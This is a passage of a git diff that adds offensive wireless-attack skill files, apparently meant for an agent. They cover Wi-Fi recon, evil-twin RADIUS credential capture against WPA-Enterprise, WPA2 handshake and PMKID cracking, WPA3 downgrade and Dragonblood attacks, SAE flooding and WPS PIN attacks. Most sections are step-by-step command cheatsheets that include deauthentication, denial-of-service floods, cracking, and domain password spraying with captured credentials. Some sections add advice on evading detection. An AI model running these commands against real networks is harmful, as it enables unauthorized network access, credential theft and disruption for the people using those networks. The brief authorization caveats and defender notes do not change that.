Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au | +| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | In-tree driver on modern kernels | +| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required | +| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release | + +```bash +# Identify your radio +lsusb | grep -iE "(atheros|realtek|mediatek|alfa)" +iw dev +iw list | grep -A 8 "Supported interface modes" +iw list | grep -E "Frequencies:" -A 30 +``` + +## Monitor Mode Setup + +```bash +# Kill conflicting services +sudo airmon-ng check kill + +# Enable monitor mode +sudo airmon-ng start wlan0 +# Or manually +sudo ip link set wlan0 down +sudo iw wlan0 set monitor control +sudo ip link set wlan0 up + +# Verify monitor mode + injection +sudo aireplay-ng --test wlan0mon +``` + +The injection test should report 30/30 ack rates against nearby APs. Lower scores indicate driver, antenna, or position issues. + +## Regulatory Domain + +```bash +# Check current +iw reg get + +# Set explicitly (us = United States, jp = Japan extended, etc.) +sudo iw reg set US +``` + +Setting the right regdomain unlocks legitimate channels (US: 1–11 on 2.4, 36–165 on 5; JP adds 12–13 + 184+ DFS) and TX power. **Operate within the regdomain you're authorized to use.** + +## Passive Multi-Band Sweep + +```bash +# All bands +sudo airodump-ng wlan0mon --band abg + +# 5 GHz only (helps see UNII bands) +sudo airodump-ng wlan0mon --band a + +# 6 GHz (requires 6E-capable adapter and updated airodump-ng) +sudo airodump-ng wlan0mon --band ax + +# Hop only specific channels +sudo airodump-ng wlan0mon -c 1,6,11,36,40,44,48 +``` + +Capture to file for later analysis: + +```bash +sudo airodump-ng wlan0mon --band abg --write recon --output-format pcap,csv +``` + +## Targeted Capture + +Once you've identified an in-scope BSSID: + +```bash +sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w target wlan0mon +``` + +Pin to the channel — channel-hopping during a focused capture loses frames. + +## Hidden SSIDs + +Hidden APs broadcast beacons with empty ESSID. The name leaks during client probes (active scan) or association requests: + +```bash +# Wait for legitimate client to associate, ESSID appears in airodump output +# Or, if a client is already associated, deauth them once to force reassociation: +sudo aireplay-ng --deauth 1 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon +``` + +(Only deauth with explicit authorization — see `offensive-deauth-disassoc`.) + +## Kismet for War-Driving + +```bash +sudo kismet -c wlan0mon +# Open https://localhost:2501 for the dashboard +``` + +Kismet handles GPS integration, plots APs to a map, fingerprints by IE order, identifies probable IoT vendors from OUI prefixes, and tags known-vulnerable models. + +For long-running captures, drop `--no-ncurses` and run headless under `tmux`. + +## Wigle Submission + +If the engagement permits: + +```bash +# Export Kismet's .kismet → CSV → Wigle import format +kismetdb_dump_devices --in capture.kismet --out devices.csv +``` + +(Wigle aggregates wireless network observations geographically — useful for mapping but check ROE.) + +## Vendor / OUI Identification + +```bash +# Quick OUI lookup +echo "AA:BB:CC" | wireshark-tools/manuf-lookup +# Or check the airodump CSV's BSSID prefix against /usr/share/wireshark/manuf +``` + +Vendor identification informs: +- Likely default credentials (router brand → known defaults) +- Known firmware bugs (CVE per chipset) +- Whether WPS is likely vulnerable (Pixie Dust per chipset) +- Whether KRACK / FragAttacks patches are likely applied (vendor patch cadence) + +## Data to Record per Target + +| Field | Why | +|-------|-----| +| BSSID | Required for every active attack | +| ESSID | Match against PNL probes; client probe correlation | +| Channel + width | Pin radio for capture | +| Band | Adapter selection | +| Encryption | WPA2-PSK / WPA2-Enterprise / WPA3-SAE / Open / WEP | +| PMF (Protected Management Frames) | Whether deauth works | +| RSSI | Position planning | +| Beacon interval / TIM | Anomaly detection vs. evil-twin defenders | +| Vendor (OUI) | Likely default creds, known bugs | +| Client list (MACs + RSSI) | Targets for deauth/relay | +| WPS enabled? | Pixie Dust candidate | + +## Detection Considerations + +A defender's WIDS sees: +- New device entering the airspace (probe requests reveal even before association) +- Channel hopping patterns of monitor-mode interfaces +- Non-standard probe behavior (KARMA-style universal responses, see `offensive-evil-twin`) + +Pure passive recon (no probes from your radio) is invisible to most WIDS deployments. Stay passive until you're committed to the active phase. + +## Engagement Cheatsheet + +```bash +# 1. Setup +sudo airmon-ng check kill && sudo airmon-ng start wlan0 +sudo iw reg set US +sudo aireplay-ng --test wlan0mon # confirm injection (skip if pure passive) + +# 2. Sweep all bands, write to file +sudo airodump-ng wlan0mon --band abg --write recon --output-format pcap,csv + +# 3. Kismet for sustained map (optional) +sudo kismet -c wlan0mon --no-ncurses --daemonize + +# 4. Per BSSID drill-down +sudo airodump-ng -c --bssid -w wlan0mon + +# 5. Build target list with all fields above +``` + +--- + +## Key References + +- IEEE 802.11-2020 (combined spec) +- aircrack-ng documentation: aircrack-ng.org +- Kismet documentation: kismetwireless.net +- WIGLE: wigle.net (read the API ToS before automated submissions) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-wpa-enterprise/SKILL.md b/Skills/wireless/offensive-wpa-enterprise/SKILL.md new file mode 100644 index 0000000..a1a176b --- /dev/null +++ b/Skills/wireless/offensive-wpa-enterprise/SKILL.md @@ -0,0 +1,207 @@ +--- +name: offensive-wpa-enterprise +description: "WPA/WPA2/WPA3-Enterprise (802.1X / EAP) attack methodology — EAP method identification (PEAP-MSCHAPv2, EAP-TTLS, EAP-TLS, EAP-GTC, EAP-PWD, EAP-FAST), evil-twin RADIUS attacks with eaphammer for credential capture, MSCHAPv2 challenge-response cracking, EAP-TLS client certificate theft paths (DPAPI, NDES, AD CS auto-enrollment), supplicant validation bypass (missing server cert validation, missing CN pinning, BYOD misconfigurations), and post-capture pivots into AD via cracked domain credentials. Use for corporate Wi-Fi engagements where the network is 802.1X authenticated." +--- + +# WPA-Enterprise (802.1X / EAP) Attacks + +Enterprise Wi-Fi delegates authentication to a RADIUS server — usually backed by AD. The PSK doesn't exist. Instead, you attack the supplicant's trust in the server certificate, the inner EAP method's crypto, or the cert-issuance path. + +## Quick Workflow + +1. Identify EAP method from beacons + initial EAP-Request/Identity +2. If MSCHAPv2-based (PEAP, TTLS): rogue RADIUS to capture challenge-response +3. If EAP-TLS: target the cert-issuance / cert-storage path (out of band) +4. Crack captured MSCHAPv2 offline → AD username + password +5. Pivot into the domain (see `offensive-active-directory` and `offensive-network`) + +--- + +## EAP Method Identification + +```bash +# Watch 802.1X exchange in monitor mode +sudo tshark -i wlan0mon -Y "eapol || eap" -V + +# Or capture and analyze +sudo airodump-ng wlan0mon -c --bssid -w eap_capture +# When client associates, read the EAP-Request/Identity and Type fields +wireshark eap_capture-01.cap +``` + +| EAP Type | Identifier | Common Inner | +|---|---|---| +| 13 | EAP-TLS | Client + server certs | +| 17 | LEAP | (legacy, weak) | +| 21 | EAP-TTLS | MSCHAPv2 / PAP / CHAP / GTC | +| 25 | PEAP | MSCHAPv2 (PEAPv0/MS) / GTC (PEAPv0/Cisco) | +| 43 | EAP-FAST | MSCHAPv2 (PAC-protected) | +| 47 | EAP-PWD | (Dragonblood-class research target) | + +## Evil-Twin RADIUS (PEAP-MSCHAPv2 / TTLS-MSCHAPv2) + +The most common attack path against corporate Wi-Fi. + +```bash +# eaphammer — automated rogue AP + RADIUS +eaphammer --cert-wizard # generate self-signed cert (first run) +eaphammer -i wlan0 \ + --essid CorpWiFi \ + --bssid AA:BB:CC:DD:EE:FF \ + --auth wpa-eap \ + --creds +``` + +When a client associates, eaphammer logs: + +``` +[*] User: corp.local\jdoe +[*] Challenge: 1122334455667788 +[*] Response: aabbccdd... +``` + +Crack offline: + +```bash +# asleap — designed for MSCHAPv2 challenge/response +asleap -C 1122334455667788 -R aabbccdd... -W rockyou.txt + +# Or hashcat mode 5500 (NetNTLMv1 / MSCHAPv2) +hashcat -m 5500 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule +``` + +The captured response is equivalent to NetNTLMv1 — feed it to a rainbow-table service (`crack.sh`) for guaranteed crack at moderate cost. + +## Why Evil-Twin Works + +The MSCHAPv2 inner exchange is encrypted in a TLS tunnel between the supplicant and the (real or fake) RADIUS server. If the supplicant doesn't validate: + +- The CA chain on the RADIUS server certificate (most BYOD configurations) +- The CN / SAN of the RADIUS server certificate (often unenforced even with CA validation) + +Then a self-signed cert is accepted, the tunnel is established with the attacker, and MSCHAPv2 happens inside. + +**Mitigation defenders should use:** +- Push GPO requiring server cert validation +- Pin trusted CA + RADIUS server CN explicitly +- For BYOD, enrollment via SCEP/Intune that locks supplicant settings + +## Supplicant Validation Bypass + +### Windows + +``` +HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy Objects\... +``` + +Look at the deployed wireless profile XML. Critical fields: + +```xml + + true + radius.corp.local + ...thumbprint... + +``` + +If `ServerNames` is missing or wildcard'd, evil-twin will succeed. + +### iOS / macOS / Android (BYOD) + +Manual entry → users typically click "Trust" on the certificate prompt the first time, including for the evil twin. After that the supplicant trusts the attacker cert by hash. Many BYOD networks rely on this acceptance without controlling the trust anchor. + +## EAP-TLS Targets + +EAP-TLS uses client certificates instead of passwords — there's nothing to crack from the wire. Attack vectors: + +### Cert Theft from User Profile + +- DPAPI master key + cert blob on Windows + - `%APPDATA%\Microsoft\SystemCertificates\My\Certificates\` + - Decrypt with DPAPI master key (requires user logon context or master key) +- macOS Keychain (login keychain) — local user access +- Android KeyStore — root + Frida hooks (see `offensive-mobile`) +- iOS — Keychain item with appropriate access group entitlement + +### NDES / SCEP Misconfig + +If the network uses SCEP for cert provisioning: + +```bash +# Discover NDES endpoint (often /certsrv/mscep/mscep.dll) +curl -I http://ndes.corp.local/certsrv/mscep/mscep.dll + +# Enroll with stolen / weak challenge password +sscep enroll -c ca.crt -k client.key -r request.csr \ + -u http://ndes.corp.local/certsrv/mscep/mscep.dll \ + -l client.crt -E 3des -S sha1 +``` + +### AD CS Auto-Enrollment with Permissive ACL + +Domain users with `Enroll` permission on a Client Authentication template can mint their own certs. See `offensive-active-directory` for ESC1-class attacks. + +## EAP-GTC + +If GTC is offered (rare, often Cisco environments), the inner exchange is **plain text**. A successful evil-twin captures the password directly with no offline cracking needed. eaphammer captures GTC the same way as MSCHAPv2. + +## Post-Crack Pivot + +A cracked MSCHAPv2 yields `corp.local\jdoe : Password123!`. From there: + +```bash +# Validate against AD +nxc smb dc.corp.local -u jdoe -p 'Password123!' -d corp.local + +# Spray against other systems +nxc smb 10.0.0.0/24 -u jdoe -p 'Password123!' -d corp.local + +# Initial AD enum +bloodhound-python -d corp.local -u jdoe -p 'Password123!' -ns dc.corp.local -c All +``` + +Hand off to the AD attack chain (`offensive-active-directory`, `offensive-network`). + +## Detection Considerations + +| Signal | Defender View | +|---|---| +| Rogue RADIUS server ESSID | WIPS rule: AP impersonation by ESSID/BSSID delta | +| Repeated MSCHAPv2 failures | RADIUS log: increased auth failures from one supplicant | +| Cert mismatch failures | Modern Windows endpoints log to Event Viewer (Wi-Fi 11005) | +| Captured user complaint | Users may report a "weird Wi-Fi prompt" — most don't | + +To minimize: match the legitimate AP's BSSID exactly (spoofed MAC), use a CA-signed cert that mimics the real RADIUS CN if you can obtain one, time the attack during known disruption windows (lunch / start of day) to blend with reconnections. + +## Engagement Cheatsheet + +```bash +# 1. Identify EAP method +sudo tshark -i wlan0mon -Y "eap" -V | grep -E "(Type:|Identity)" + +# 2. Run eaphammer evil twin +eaphammer --cert-wizard +eaphammer -i wlan0 --essid --bssid --auth wpa-eap --creds + +# 3. As clients connect, capture MSCHAPv2 challenges +# Watch eaphammer console for User/Challenge/Response + +# 4. Crack offline +hashcat -m 5500 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule +# Or asleap -C -R -W wordlist + +# 5. Validate creds against domain +nxc smb -u -p -d + +# 6. Hand off to AD chain +``` + +--- + +## Key References + +- eaphammer: github.com/s0lst1c3/eaphammer +- asleap: willhackforsushi.com/asleap +- crack.sh — NetNTLMv1 (MSCHAPv2) rainbow service +- RFC 3748 (EAP), RFC 5216 (EAP-TLS), RFC 7170 (EAP-TEAP) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-wpa2-psk/SKILL.md b/Skills/wireless/offensive-wpa2-psk/SKILL.md new file mode 100644 index 0000000..8a702d5 --- /dev/null +++ b/Skills/wireless/offensive-wpa2-psk/SKILL.md @@ -0,0 +1,176 @@ +--- +name: offensive-wpa2-psk +description: "WPA/WPA2-PSK attack methodology — four-way handshake capture via targeted deauthentication, PMKID attacks (no client required), hcxdumptool / hcxpcapngtool conversion to hashcat hc22000 format, GPU-accelerated cracking with dictionary, mask, and rule-based attacks, vendor default-PSK generators (UPC, Sky, BT, etc.), 802.11r FT key cracking, opportunistic key cache analysis, and signal-level optimization. Use when the in-scope network is WPA/WPA2 Personal — the most common consumer/SMB encryption mode." +--- + +# WPA/WPA2-PSK Attacks + +The default mode for almost every consumer and SMB Wi-Fi network. The four-way handshake's PMKID and EAPOL frames give you everything you need to crack offline — no online attempts, no lockout, no detection signal beyond the deauth (which you can avoid with PMKID). + +## Quick Workflow + +1. Identify the target BSSID, channel, and encryption (see `offensive-wifi-recon`) +2. Try PMKID first (fast, no client interaction) +3. Fall back to four-way handshake capture if PMKID isn't yielded +4. Convert capture to hashcat-compatible format +5. Crack offline with appropriate wordlist + rules + masks + +--- + +## PMKID Attack (Preferred When Possible) + +The PMKID is included in the first message of the four-way handshake. Many APs leak it in response to a single association request — no real client needed. + +```bash +# Setup +sudo airmon-ng check kill && sudo airmon-ng start wlan0 +sudo iw reg set US + +# Sweep PMKIDs across all visible APs +sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ + --enable_status=1 \ + --filterlist_ap=targets.txt --filtermode=2 + +# Convert to hashcat format +hcxpcapngtool -o hash.hc22000 pmkid.pcapng +``` + +`targets.txt` contains BSSIDs (one per line) you're authorized to attack. + +If `hash.hc22000` is empty, the AP doesn't yield PMKIDs. Move to four-way handshake. + +## Four-Way Handshake Capture + +```bash +# Pin to channel +sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon +``` + +If a client is associated: + +```bash +# Targeted deauth (single client, low volume) +sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon +``` + +The handshake will appear in airodump's top-right corner as `WPA handshake: AA:BB:CC:DD:EE:FF`. + +**Why one client at a time:** broadcast deauth (no `-c`) trips WIDS quickly and is louder. A single 5-deauth burst targeted at one MAC is enough. + +## Verifying the Capture + +```bash +hcxpcapngtool -o hash.hc22000 handshake-01.cap +# Look for "M1+M2 ... AUTHORIZED" or "M2 ... AUTHORIZED" lines +``` + +If the tool reports the M1/M2 pair without proper EAPOL authentication, capture again. Bad / partial handshakes will fail to crack. + +## Cracking + +### Dictionary + Rules + +```bash +hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule +``` + +Useful wordlists: +- `rockyou.txt` (classic) +- `weakpass_3` / `weakpass_4` (huge breach corpus) +- `crackstation.txt` +- Targeted: company name, products, locations + +### Mask Attacks for Common Default Patterns + +```bash +# 10 digits (common ISP default — UPC, Vodafone, etc.) +hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d + +# 8 digits (D-Link, ZTE) +hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d + +# 8 hex (some Belkin / Linksys) +hashcat -m 22000 hash.hc22000 -a 3 ?h?h?h?h?h?h?h?h + +# Phone number patterns +hashcat -m 22000 hash.hc22000 -a 3 1?d?d?d?d?d?d?d?d?d?d +``` + +### Vendor Default Generators + +Some ISP routers derive the PSK from the SSID prefix + serial number suffix using known algorithms: + +```bash +# UPC-XXXXXXX → upc_keys generates candidate keys +upc_keys ESSID | hashcat -m 22000 hash.hc22000 - + +# Other generators: skylogin, BT-Hub-PSK-Generator, ZyxelKeygen +# Check vendor-specific tools per router brand +``` + +### 802.11r FT Cracking + +If 802.11r (Fast Transition) is enabled, the AP-to-AP key transit is captureable on the wired side or visible in air during roaming events. The PMK derivation gives an alternative crack path with the same hc22000 format. + +## Tuning Cracking Performance + +```bash +# Show recommended workload tuning per GPU +hashcat -b -m 22000 + +# Distributed cracking via hashtopolis or naive split +hashcat -m 22000 hash.hc22000 wordlist.txt -s 0 -l 1000000 +hashcat -m 22000 hash.hc22000 wordlist.txt -s 1000000 -l 1000000 +``` + +## Opportunistic Key Cache (OKC) + +When OKC is enabled (common in WPA2-Enterprise too), the AP caches the PMK from a previous successful association and reuses it on roam — bypassing the full handshake. From an attacker view, OKC handshakes have the same recoverable PMK material; the impact is mostly that you'll see fewer M1/M2 pairs in the air. + +## Detection Considerations + +| Signal | Defender View | +|---|---| +| Deauth burst | WIDS rule: >N deauth/sec with malformed reason codes | +| PMKID flood (hcxdumptool default sends many association requests) | WIDS rule: rapid associations from a single MAC | +| Monitor-mode interface | Some enterprise WIDS deployments fingerprint adjacent monitor radios | + +To minimize: PMKID with `--filtermode=2` (only target your authorized list), single targeted deauth bursts, randomize source MAC between captures. + +## Engagement Cheatsheet + +```bash +# 1. Setup +sudo airmon-ng check kill && sudo airmon-ng start wlan0 +sudo iw reg set US + +# 2. PMKID sweep first +echo "AA:BB:CC:DD:EE:FF" > targets.txt +sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ + --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 + +# 3. Convert + try crack +hcxpcapngtool -o hash.hc22000 pmkid.pcapng +hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule + +# 4. If empty PMKID, do four-way capture +sudo airodump-ng -c --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon & +sudo aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF -c wlan0mon + +# 5. Convert + crack +hcxpcapngtool -o hash.hc22000 cap-01.cap +hashcat -m 22000 hash.hc22000 wordlist.txt -r OneRuleToRuleThemAll.rule + +# 6. Mask attacks if dictionary fails +hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d +``` + +--- + +## Key References + +- hashcat docs (mode 22000): hashcat.net/wiki/doku.php?id=cracking_wpawpa2 +- hcxtools: github.com/ZerBea/hcxtools +- ZerBea PMKID research (original 2018 disclosure) +- 802.11i-2004 (WPA2 spec) +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-wpa3-sae/SKILL.md b/Skills/wireless/offensive-wpa3-sae/SKILL.md new file mode 100644 index 0000000..184b63b --- /dev/null +++ b/Skills/wireless/offensive-wpa3-sae/SKILL.md @@ -0,0 +1,159 @@ +--- +name: offensive-wpa3-sae +description: "WPA3 / SAE (Simultaneous Authentication of Equals) attack methodology — transition-mode (mixed WPA2/WPA3) downgrade, Dragonblood side-channel attacks (CVE-2019-9494, 9495, 13377, 13456), SAE auth flooding for AP CPU exhaustion, Hash-to-Element (H2E) timing analysis, group downgrade, and 6 GHz / Wi-Fi 6E spec implications (PMF mandatory, no transition mode allowed). Use when target advertises WPA3-SAE or WPA3-Personal/Enterprise, or operates in 6 GHz where WPA3 + PMF are required by spec." +--- + +# WPA3 / SAE Attacks + +WPA3 fixes the offline-handshake-cracking weakness of WPA2 by replacing the 4-way PSK exchange with SAE (a Dragonfly-derived password-authenticated key exchange). The straightforward offline crack disappears — but transition-mode misconfigurations and the original SAE implementation's side-channel leaks open new paths. + +## Quick Workflow + +1. Verify the target advertises WPA3 (RSN IE shows AKM SAE = 8) +2. Check for transition-mode (mixed WPA2 + WPA3) — easiest path +3. If pure WPA3, fingerprint the AP's hostapd version for Dragonblood applicability +4. Side-channel timing or cache attacks if reachable +5. Otherwise, accept that offline cracking isn't viable — pivot to other surfaces + +--- + +## Transition-Mode Downgrade + +If the AP advertises both WPA2-PSK and WPA3-SAE (transition mode for mixed-client networks), older clients can be forced onto WPA2: + +```bash +# Identify transition mode in beacon frames +sudo airodump-ng wlan0mon -c --bssid +# Encryption column shows WPA2 WPA3 (both) +``` + +Steps: + +1. Spoof a beacon advertising **only RSN-WPA2** with the same BSSID/SSID +2. Client roams to your beacon, performs WPA2 4-way handshake +3. Capture handshake exactly like `offensive-wpa2-psk` + +```bash +# Use hostapd-mana or airbase-ng for the WPA2-only AP advertisement +airbase-ng -e CorpWiFi -c 6 -W 1 wlan0mon +# -W 1 enables WPA, configure for WPA2-only RSN element +``` + +**Why this works:** WPA3-SAE clients fall back to WPA2-PSK if the AP only advertises WPA2 — there's no protected downgrade defense in transition mode. WPA3-only mode (no transition) blocks this. + +**Mitigation defenders use:** WPA3-only networks (no WPA2). Wi-Fi 6E (6 GHz) mandates WPA3-only by spec. + +## Dragonblood (CVE-2019-9494 / 9495 / 13377 / 13456) + +Side-channel and downgrade attacks against the SAE Hunting-and-Pecking algorithm in pre-2.10 hostapd / wpa_supplicant. + +### Cache-Based Side-Channel + +The original SAE password-element derivation iterates a variable number of times depending on the password and MAC. Cache hits leak the iteration count. + +```bash +git clone https://github.com/vanhoefm/dragonblood +cd dragonblood + +# Cache-based attack (requires co-located malicious code on target host — limited) +python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon +``` + +### Timing Side-Channel + +The same iteration count leaks via observable timing of the SAE commit phase from outside. + +```bash +python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon --mode timing +``` + +### Downgrade to Weak Group + +Some implementations accept SAE with the deprecated MODP group 5 if the client requests it. Combined with cache/timing side channels, this enables offline dictionary attack. + +```bash +python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF +``` + +### Patched Versions + +| Implementation | Fixed | +|---|---| +| hostapd / wpa_supplicant | 2.10 (April 2022) | +| Apple iOS / macOS | 2019 patches | +| Windows | KB-batched 2019-2020 | +| Embedded routers | Often unpatched — high hit rate on consumer SOHO | + +## Hash-to-Element (H2E) + +WPA3 R2 introduced H2E to replace the iteration-leaky Hunting-and-Pecking. H2E is constant-time. If the AP advertises H2E in the RSNXE element, Dragonblood-class attacks don't apply. + +```bash +# Wireshark filter +wlan.rsnx.field.h2e +``` + +If H2E is present and required (no Hunting-and-Pecking fallback), only the spec is left to attack — abandon SAE attacks and pivot to other surfaces (PMF check, evil-twin via EAP if Enterprise, supply-chain via management frames). + +## SAE Auth Flooding (DoS) + +SAE's commit phase requires the AP to do heavy elliptic-curve work per association attempt. Floods can exhaust CPU on lower-end APs, denying service to legitimate clients. + +```bash +sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024 +# Auth attack mode -a, multiple per second -s 1024 +``` + +**This is a DoS — only with explicit authorization.** Modern enterprise APs use anti-clogging tokens to throttle SAE-flood attacks; consumer routers often don't. + +## 6 GHz / Wi-Fi 6E Implications + +The 6 GHz band (Wi-Fi 6E, channels 1–233 in the 5925–7125 MHz range) requires: + +- **WPA3-only** (no transition mode) +- **PMF (802.11w) mandatory** (deauth/disassoc protected) +- **OWE (Opportunistic Wireless Encryption)** for open networks + +Net effect: most pre-WPA3 attacks (deauth, transition-mode downgrade) don't apply on 6 GHz. Pure SAE side-channel, evil-twin, or out-of-band attacks remain viable. + +## Detection Considerations + +WPA3 is enterprise-defended much like WPA2 — WIDS catches: + +- Beacon spoofing (transition-mode downgrade) via fingerprint mismatch (IE order, vendor-specific, beacon timing) +- SAE flood via association rate per source MAC +- Repeated SAE commit failures (timing attack telemetry) + +Successful Dragonblood-class attacks against patched modern hostapd are unlikely. Consumer SOHO and embedded APs are still in scope. + +## Engagement Cheatsheet + +```bash +# 1. Identify mode +sudo airodump-ng wlan0mon -c --bssid +# Encryption: WPA2 + WPA3 → transition; WPA3-only → SAE-only + +# 2. Transition-mode downgrade attempt +sudo airbase-ng -e -c -W 1 -z 4 wlan0mon # WPA2-RSN advertised only + +# 3. Wait for client roam, capture WPA2 handshake (handoff to offensive-wpa2-psk) + +# 4. If pure WPA3, fingerprint hostapd +# (passive analysis of beacon IE order + version-specific behaviors) + +# 5. Run Dragonblood test scripts if pre-2.10 hostapd suspected +python3 dragondrain.py wlan0mon +python3 dragontime.py --bssid --iface wlan0mon + +# 6. Document residual viable attacks; pivot to evil-twin / EAP / RF if pure WPA3 R2 +``` + +--- + +## Key References + +- Dragonblood: dragonblood.net (Vanhoef + Ronen) +- IEEE 802.11-2020 (combined spec including WPA3) +- WFA WPA3 Specification +- hostapd 2.10 release notes +- Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md diff --git a/Skills/wireless/offensive-wps/SKILL.md b/Skills/wireless/offensive-wps/SKILL.md new file mode 100644 index 0000000..462daf3 --- /dev/null +++ b/Skills/wireless/offensive-wps/SKILL.md @@ -0,0 +1,166 @@ +--- +name: offensive-wps +description: "WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout handling, time-of-day evasion, WPS push-button vulnerability windows, and PIN-to-PSK derivation. Use when a target SOHO router exposes WPS — common on consumer ISP gear, often left enabled by default even when WPS attacks have been known for over a decade." +--- + +# WPS PIN Attacks + +WPS converts an 8-digit PIN into the network PSK via the M3/M4 message exchange. The PIN is split into 4-digit + 3-digit halves (the 8th digit is a checksum), giving only 11,000 effective combinations — and on vulnerable chipsets, the offline Pixie Dust attack recovers the PIN in seconds without ever sending an online attempt. + +## Quick Workflow + +1. Detect WPS-enabled APs (look for the WPS IE in beacons) +2. Try Pixie Dust first — offline, undetectable, instantaneous when it works +3. If chipset isn't vulnerable, check whether online brute is feasible (lockout policy) +4. Online brute as last resort, slow and detectable + +--- + +## Detection + +```bash +# wash — dedicated WPS scanner +sudo wash -i wlan0mon + +# Or use airodump-ng with WPS column +sudo airodump-ng wlan0mon --wps +``` + +Output includes: WPS version (1.0 / 2.0), Locked status, Configured/Unconfigured, vendor. + +WPS 2.0 introduced lockout enforcement, but many consumer APs still implement it as "lock for 60 seconds after 3 failures" — easily bypassed by waiting. + +## Pixie Dust (Offline) + +The Pixie Dust attack exploits weak nonce generation in WPS-implementing chipsets. The attack captures one full WPS handshake (M1-M4) and then offline-computes the PIN. + +```bash +# reaver with Pixie Dust mode +sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv + +# bully alternative +sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon +``` + +| Chipset | Vulnerable? | +|---|---| +| Ralink (RT chipsets) | Yes — most older D-Link, TP-Link, Edimax | +| Realtek (RTL8xxx) | Yes — many TRENDnet, Belkin | +| Broadcom (older firmware) | Often yes — specific model + firmware revs | +| MediaTek (specific revs) | Mixed | +| Atheros | Mostly patched | + +When successful: + +``` +[Pixie-Dust] WPS PIN: 12345670 +[Pixie-Dust] WPA PSK: ActualPasswordHere +[Pixie-Dust] AP SSID: HomeWiFi +``` + +The PIN gives you the PSK directly via the M7 message — no PSK cracking needed. + +## Online PIN Brute-Force + +When Pixie Dust fails, online brute is the fallback. Send EAPOL-Start → M1 → M2 → M3 attempts with successive PINs. + +```bash +# reaver online mode (default) +sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \ + -L -N -d 15 -t 30 -T .5 -r 3:30 -vv + +# Flags: +# -L : ignore failed lockouts +# -N : don't send NACK packets +# -d 15 : 15-second delay between attempts +# -t 30 : timeout +# -T .5 : timeout for receiving M5/M7 +# -r 3:30 : pause 30s every 3 attempts +``` + +### Lockout Handling + +Most modern APs lock WPS after a few failed PINs. Detect lockout: + +- AP stops responding to EAPOL-Start +- WPS `Locked` flag in beacon switches to `Yes` + +Strategies: +- **Wait it out**: many APs auto-unlock after 60–600 seconds. Set `-r` accordingly. +- **Reboot the AP**: physically resets state. Only works if you have authorization for that disruption. +- **Spread attempts across time of day**: low-traffic windows to avoid coincident legitimate WPS use that triggers admin attention. + +### Time Estimate + +- 11,000 attempts × (delay + timeout) ≈ best case 4 hours, realistic 12–24 hours +- Lockout multiplier: 5–20x depending on policy +- **Pixie Dust beats this by minutes when vulnerable.** Always try first. + +## Push-Button (PBC) Method + +WPS PBC opens a 120-second window after the user presses the button on the AP. During this window any client requesting WPS is paired without PIN. + +Attack viability: +- Practically: requires either physical access to push the button (= you've already won) or social engineering ("the IT guy will press the button at 14:00") +- Some buggy APs have a permanent PBC window — test by sending PBC association + +```bash +# Trigger PBC pairing attempt +sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -p '00000000' -P +``` + +## PIN-Default Patterns + +Some vendors derive the WPS PIN from MAC + serial. With known algorithms: + +```bash +# wpscalc / WPSPIN — calculate likely PINs from BSSID +wpspin --bssid AA:BB:CC:DD:EE:FF +# Outputs candidate PINs to try first before brute +``` + +Hit rate is high on certain Belkin, ZyXEL, and Linksys models. + +## Detection Considerations + +| Signal | Defender View | +|---|---| +| Reaver/bully traffic pattern | WIPS rule: rapid WPS exchange attempts | +| PIN failures spike | WPS `Locked` flag flip | +| Vendor PSK leaked offline | Undetectable — Pixie Dust is offline | +| Consumer admin interface | "WPS attempt" might log if AP has audit features (rare) | + +Pixie Dust against a vulnerable chipset is essentially undetectable from the wire perspective — only one WPS exchange happens, identical to a legitimate client. + +## Engagement Cheatsheet + +```bash +# 1. Setup +sudo airmon-ng check kill && sudo airmon-ng start wlan0 + +# 2. Find WPS APs +sudo wash -i wlan0mon + +# 3. Pixie Dust first +sudo reaver -i wlan0mon -b -K 1 -vvv + +# 4. If Pixie Dust fails, try vendor-specific PIN candidates +wpspin --bssid | head -10 + +# 5. Online brute as last resort +sudo reaver -i wlan0mon -b -L -N -d 15 -t 30 -r 3:30 -vv + +# 6. Once PIN known, derive PSK from M7 message +# (reaver does this automatically; bully prints PSK on success) +``` + +--- + +## Key References + +- pixiewps: 